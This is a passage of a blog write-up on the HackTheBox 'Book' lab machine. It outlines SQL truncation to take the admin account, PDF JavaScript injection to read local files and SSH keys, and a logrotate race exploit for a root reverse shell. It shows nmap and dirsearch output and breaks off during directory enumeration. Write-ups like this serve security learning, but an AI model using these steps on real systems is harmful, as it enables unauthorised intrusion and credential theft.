<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Quick Summary   → A fun box machine that was vulnerable to sql truncate and local file read via javascript injection. As the attacker I was able to get the admin by bypassing the limit characters of">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Book 📚 📖">
<meta property="og:url" content="https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/index.html">
<meta property="og:site_name" content="❯ PΛYΛƧ0">
<meta property="og:description" content="Quick Summary   → A fun box machine that was vulnerable to sql truncate and local file read via javascript injection. As the attacker I was able to get the admin by bypassing the limit characters of">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-login-signup.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-create-account.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-admin-signin.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-admin-home.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-upload-exploit.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-etc-passwd.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/book/book-upload-exploit.png">
<meta property="og:image" content="https://www.hackthebox.eu/badge/image/128965">
<meta property="article:published_time" content="2020-07-08T00:52:03.000Z">
<meta property="article:modified_time" content="2020-08-15T17:04:13.286Z">
<meta property="article:author" content="medz">
<meta property="article:tag" content="retired">
<meta property="article:tag" content="LFI">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="SQL truncate">
<meta property="article:tag" content="javascript">
<meta property="article:tag" content="Local File Read">
<meta property="article:tag" content="Logrotate">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ph-payas0.github.io/img/book/book.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon-1.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>HackTheBox - Book 📚 📖</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="❯ PΛYΛƧ0" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020-07-15/HackTheBox-Sauna/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020-07-03/HackTheBox-ForwardSlash/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&text=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&is_video=false&description=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Book 📚 📖&body=Check out this article: https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&name=HackTheBox - Book 📚 📖&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&t=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#The-Book-Website"><span class="toc-number">4.1.</span> <span class="toc-text">The Book Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-SQL-Truncate"><span class="toc-number">5.1.</span> <span class="toc-text">Abusing SQL Truncate</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Local-File-Read-via-PDF"><span class="toc-number">6.1.</span> <span class="toc-text">Local File Read via PDF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Creating-javascript-payloads"><span class="toc-number">6.2.</span> <span class="toc-text">Creating javascript payloads</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-the-user-flag"><span class="toc-number">6.3.</span> <span class="toc-text">Grab the user flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Getting-Root-Access"><span class="toc-number">7.1.</span> <span class="toc-text">Getting Root Access</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Logrotten"><span class="toc-number">7.2.</span> <span class="toc-text">Logrotten</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Compile-logrotten"><span class="toc-number">7.3.</span> <span class="toc-text">Compile logrotten</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-for-Reverse-Shell"><span class="toc-number">7.4.</span> <span class="toc-text">Payload for Reverse Shell</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
        <div class="content index py4">
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Book 📚 📖
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">❯ PΛYΛƧ0</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-07-08T00:52:03.000Z" itemprop="datePublished">08-07-2020</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/HackTheBox/PenTesting/">PenTesting</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/LFI/" rel="tag">LFI</a>, <a class="tag-link" href="/tags/Local-File-Read/" rel="tag">Local File Read</a>, <a class="tag-link" href="/tags/Logrotate/" rel="tag">Logrotate</a>, <a class="tag-link" href="/tags/SQL-truncate/" rel="tag">SQL truncate</a>, <a class="tag-link" href="/tags/javascript/" rel="tag">javascript</a>, <a class="tag-link" href="/tags/linux/" rel="tag">linux</a>, <a class="tag-link" href="/tags/retired/" rel="tag">retired</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/img/book/book.png" alt="HackTheBox-Book" title="Book"></p>
<hr>
<h2 id="Quick-Summary"><a href="#Quick-Summary" class="headerlink" title="Quick Summary"></a>Quick Summary</h2><p>   → A fun box machine that was vulnerable to <code>sql truncate</code> and <code>local file read</code> via javascript injection. As the attacker I was able to get the admin by bypassing the limit characters of <code>username</code> and <code>password</code>. I created another account to send pdf files which contains javascript payloads which lead to <code>local file read</code> from there I was able to get the <code>SSH keys</code> of the user and use it to get in. To get <code>root</code> access we find <code>logrotten</code> which exploit a race condition and using that we can get a shell as <code>root</code></p>
<hr>
<h2 id="Penetration-Testing-Methodologies"><a href="#Penetration-Testing-Methodologies" class="headerlink" title="Penetration Testing Methodologies"></a>Penetration Testing Methodologies</h2><ol>
<li><p><strong>Network Scanning</strong></p>
<p>→ Nmap scan</p>
<p>→ discover open ports and what services are running</p>
</li>
<li><p><strong>Enumeration</strong></p>
<p>→ Found <code>login</code> and <code>registration</code> page</p>
<p>→ <code>username</code> &amp; <code>password</code> has set limit characters in registration form</p>
<p>→ running <code>dirsearch</code> to enumerate potential web directories</p>
<p>→ Found <code>admin</code> login page</p>
</li>
</ol>
<ol start="3">
<li><p><strong>Post - Exploitation</strong></p>
<p>→ abusing <code>sql truncation</code> vulnerabilities and create account as admin using <code>admin@htb</code></p>
<p>→ go to file upload section that generating <code>pdf</code> files.</p>
<p>→ trying to inject malicious <code>javascript</code> payloads to check if is vulnerable to <code>local file read</code> vulnerabilities.</p>
<p>→ <code>local file read</code> vulnerabilities confirmed !</p>
</li>
<li><p><strong>Exploitation</strong></p>
<p>→ create a malicious <code>javascript files</code> which can get info of a <code>user</code> which generated into <code>pdf</code></p>
<p>→ extract <code>SSH keys</code> of a user and use it get in to shell</p>
<p>→ finally got the <code>user.txt</code></p>
</li>
<li><p><strong>Privilege Escalation</strong></p>
<p>→ use <code>pspy</code> to monitor running services</p>
<p>→ Looking for exploit for logrotate </p>
<p>→ compile <code>logrotate</code> exploit and make a another payload for <code>reverse shell</code></p>
<p>→ execute the exploit with payload</p>
<p>→ Finally got the <code>root flag</code></p>
</li>
</ol>
<hr>
<h2 id="Network-Scanning"><a href="#Network-Scanning" class="headerlink" title="Network Scanning"></a>Network Scanning</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>→ I always begin at <strong><em>NMAP</em></strong> to look on the services what is running. I always use</p>
<hr>
<ul>
<li>-sV      ⇒ Probe open ports to determine service/version info</li>
<li>-sC      ⇒ equivalent to —script=default</li>
<li>-A-      ⇒ Agressive scan</li>
<li>-oN      ⇒ to save our scan results to a text file</li>
</ul>
<hr>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">nmap -sV -sC -A <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span> -oN nmap-Book</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book </span><br><span class="line">❯ nmap -sV -sC -A <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span> -oN nmap-Book</span><br><span class="line">Starting Nmap <span class="number">7.80</span> ( https:<span class="comment">//nmap.org ) at 2020-04-15 08:50 PST</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span></span><br><span class="line">Host is up (<span class="number">0.25</span>s latency).</span><br><span class="line">Not shown: <span class="number">998</span> closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line"><span class="number">22</span>/tcp <span class="built_in">open</span>  ssh     OpenSSH <span class="number">7.6</span>p1 Ubuntu <span class="number">4u</span>buntu0<span class="number">.3</span> (Ubuntu Linux; protocol <span class="number">2.0</span>)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   <span class="number">2048</span> f7:fc:<span class="number">57</span>:<span class="number">99</span>:f6:<span class="number">82</span>:e0:<span class="number">03</span>:d6:<span class="number">03</span>:bc:<span class="number">09</span>:<span class="number">43</span>:<span class="number">01</span>:<span class="number">55</span>:b7 (RSA)</span><br><span class="line">|   <span class="number">256</span> a3:e5:d1:<span class="number">74</span>:c4:<span class="number">8</span>a:e8:c8:<span class="number">52</span>:c7:<span class="number">17</span>:<span class="number">83</span>:<span class="number">4</span>a:<span class="number">54</span>:<span class="number">31</span>:bd (ECDSA)</span><br><span class="line">|_  <span class="number">256</span> e3:<span class="number">62</span>:<span class="number">68</span>:<span class="number">72</span>:e2:c0:ae:<span class="number">46</span>:<span class="number">67</span>:<span class="number">3</span>d:cb:<span class="number">46</span>:bf:<span class="number">69</span>:b9:<span class="number">6</span>a (ED25519)</span><br><span class="line"><span class="number">80</span>/tcp <span class="built_in">open</span>  http    Apache httpd <span class="number">2.4</span><span class="number">.29</span> ((Ubuntu))</span><br><span class="line">| http-cookie-flags: </span><br><span class="line">|   /: </span><br><span class="line">|     PHPSESSID: </span><br><span class="line">|_      httponly flag <span class="keyword">not</span> <span class="built_in">set</span></span><br><span class="line">|_http-server-header: Apache/<span class="number">2.4</span><span class="number">.29</span> (Ubuntu)</span><br><span class="line">|_http-title: LIBRARY - Read | Learn | Have Fun</span><br><span class="line">No exact OS matches <span class="keyword">for</span> host (If you know what OS is <span class="built_in">running</span> on it, see https:<span class="comment">//nmap.org/submit/ ).</span></span><br><span class="line">TCP/IP fingerprint:</span><br><span class="line">OS:SCAN(V=<span class="number">7.80</span>%E=<span class="number">4</span>%D=<span class="number">4</span>/<span class="number">15</span>%OT=<span class="number">22</span>%CT=<span class="number">1</span>%CU=<span class="number">40722</span>%PV=Y%DS=<span class="number">2</span>%DC=T%G=Y%TM=<span class="number">5E965</span>A7</span><br><span class="line">OS:<span class="number">0</span>%P=x86_64-pc-linux-gnu)SEQ(SP=<span class="number">101</span>%GCD=<span class="number">1</span>%ISR=<span class="number">105</span>%TI=Z%CI=Z%II=I%TS=A)OPS</span><br><span class="line">OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1</span><br><span class="line">OS:<span class="number">1</span>NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN</span><br><span class="line">OS:(R=Y%DF=Y%T=<span class="number">40</span>%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=<span class="number">40</span>%S=O%A=S+%F=A</span><br><span class="line">OS:S%RD=<span class="number">0</span>%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=<span class="number">40</span>%W=<span class="number">0</span>%S=A%A=Z%F=R%O=%RD=<span class="number">0</span>%Q=)T5(R</span><br><span class="line">OS:=Y%DF=Y%T=<span class="number">40</span>%W=<span class="number">0</span>%S=Z%A=S+%F=AR%O=%RD=<span class="number">0</span>%Q=)T6(R=Y%DF=Y%T=<span class="number">40</span>%W=<span class="number">0</span>%S=A%A=Z%F</span><br><span class="line">OS:=R%O=%RD=<span class="number">0</span>%Q=)T7(R=Y%DF=Y%T=<span class="number">40</span>%W=<span class="number">0</span>%S=Z%A=S+%F=AR%O=%RD=<span class="number">0</span>%Q=)U1(R=Y%DF=N%</span><br><span class="line">OS:T=<span class="number">40</span>%IPL=<span class="number">164</span>%UN=<span class="number">0</span>%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=<span class="number">40</span>%CD</span><br><span class="line">OS:=S)</span><br><span class="line"></span><br><span class="line">Network Distance: <span class="number">2</span> hops</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (<span class="keyword">using</span> port <span class="number">8888</span>/tcp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line"><span class="number">1</span>   <span class="number">250.00</span> ms <span class="number">10.10</span><span class="number">.14</span><span class="number">.1</span></span><br><span class="line"><span class="number">2</span>   <span class="number">252.00</span> ms <span class="number">10.10</span><span class="number">.10</span><span class="number">.176</span></span><br><span class="line"></span><br><span class="line">OS <span class="keyword">and</span> Service detection performed. Please report any incorrect results at https:<span class="comment">//nmap.org/submit/ .</span></span><br><span class="line">Nmap done: <span class="number">1</span> IP address (<span class="number">1</span> host up) scanned in <span class="number">37.40</span> seconds</span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book took <span class="number">37</span>s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Nmap-results"><a href="#Nmap-results" class="headerlink" title="Nmap results"></a>Nmap results</h3><p>So there’s only 2 port open.</p>
<ul>
<li>22       ⇒ which is running a <code>SSH Client</code></li>
<li>80       ⇒ which basically a web service</li>
</ul>
<hr>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><h3 id="The-Book-Website"><a href="#The-Book-Website" class="headerlink" title="The Book Website"></a>The Book Website</h3><p>Since there’s web service I always looking that first </p>
<p><img src="/img/book/book-login-signup.png" alt="HackTheBox-Book" title="Book"></p>
<p>It’s a login page and there’s also a create account</p>
<p><img src="/img/book/book-create-account.png" alt="HackTheBox-Book" title="Book"></p>
<p>I look at the source code and I found something useful, <code>username</code> and <code>password</code> has set to limit characters which can possibly vulnerable to <code>sql truncation</code></p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="comment">// javascript</span></span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">  <span class="built_in">window</span>.console = <span class="built_in">window</span>.console || <span class="function"><span class="keyword">function</span>(<span class="params">t</span>) </span>&#123;&#125;;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;script&gt;</span></span><br><span class="line"><span class="regexp">  if (document.location.search.match(/</span>type=embed/gi)) &#123;</span><br><span class="line">    <span class="built_in">window</span>.parent.postMessage(<span class="string">"resize"</span>, <span class="string">"*"</span>);</span><br><span class="line">  &#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">validateForm</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> x = <span class="built_in">document</span>.forms[<span class="string">"myForm"</span>][<span class="string">"name"</span>].value;</span><br><span class="line">  <span class="keyword">var</span> y = <span class="built_in">document</span>.forms[<span class="string">"myForm"</span>][<span class="string">"email"</span>].value;</span><br><span class="line">  <span class="keyword">if</span> (x == <span class="string">""</span>) &#123;</span><br><span class="line">    alert(<span class="string">"Please fill name field. Should not be more than 10 characters"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (y == <span class="string">""</span>) &#123;</span><br><span class="line">    alert(<span class="string">"Please fill email field. Should not be more than 20 characters"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>


<p>There’s also <code>Contact us</code> where you can send message in <code>admin@book.htb</code></p>
<p>Since there’s no clue what’s the next step here’ i use <code>dirsearch</code> to bruteforce web directories. This is the best thing to do to get hidden stuff on the site.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">root in htb/boxes/Book </span><br><span class="line">❯ python3 /opt/dirsearch/dirsearch.py -u <span class="string">"http://10.10.10.176"</span> -e asd -t <span class="number">20</span> --simple-report=directories.Book</span><br><span class="line"></span><br><span class="line"> _|. _ _  _  _  _ _|_    v0<span class="number">.3</span><span class="number">.9</span></span><br><span class="line">(_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: asd | HTTP method: <span class="built_in">get</span> | Threads: <span class="number">20</span> | Wordlist <span class="built_in">size</span>: <span class="number">6109</span></span><br><span class="line"></span><br><span class="line">Error Log: /opt/dirsearch/logs/errors<span class="number">-20</span><span class="number">-04</span><span class="number">-15</span>_08<span class="number">-59</span><span class="number">-47.l</span>og</span><br><span class="line"></span><br><span class="line">Target: http:<span class="comment">//10.10.10.176</span></span><br><span class="line"></span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">48</span>] Starting: </span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.ht_wsr.txt                              </span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.hta</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess-dev</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess-local</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess-marco</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.BAK</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.bak1</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.orig</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.old</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.sample</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.save</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess.txt</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess_extra</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess_orig</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess_sc</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccessBAK</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccessOLD</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccessOLD2</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htaccess~</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htgroup</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htpasswd-old</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htpasswd_test</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htpasswds</span><br><span class="line">[<span class="number">08</span>:<span class="number">59</span>:<span class="number">53</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /.htusers</span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">03</span>] <span class="number">301</span> -  <span class="number">312B</span>  - /admin  -&gt;  http:<span class="comment">//10.10.10.176/admin/                 </span></span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">04</span>] <span class="number">200</span> -    <span class="number">6</span>KB - /admin/                 </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">04</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /admin/.htaccess</span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">04</span>] <span class="number">200</span> -    <span class="number">6</span>KB - /admin/?/login         </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">05</span>] <span class="number">302</span> -    <span class="number">0B</span>  - /admin/<span class="built_in">home</span>.php  -&gt;  index.php                                                    </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">06</span>] <span class="number">200</span> -    <span class="number">6</span>KB - /admin/index.php                             </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">29</span>] <span class="number">403</span> -  <span class="number">277B</span>  - /docs/                                                                                  </span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">29</span>] <span class="number">301</span> -  <span class="number">311B</span>  - /docs  -&gt;  http:<span class="comment">//10.10.10.176/docs/</span></span><br><span class="line">[<span class="number">09</span>:<span class="number">00</span>:<span class="number">35</span>] <span class="number">302</span> -    <span class="number">0B</span>  - /<span class="built_in">home</span>.php  -&gt;  index.php                                                    </span><br><span class="line">[<span class="number">09</span>:<span 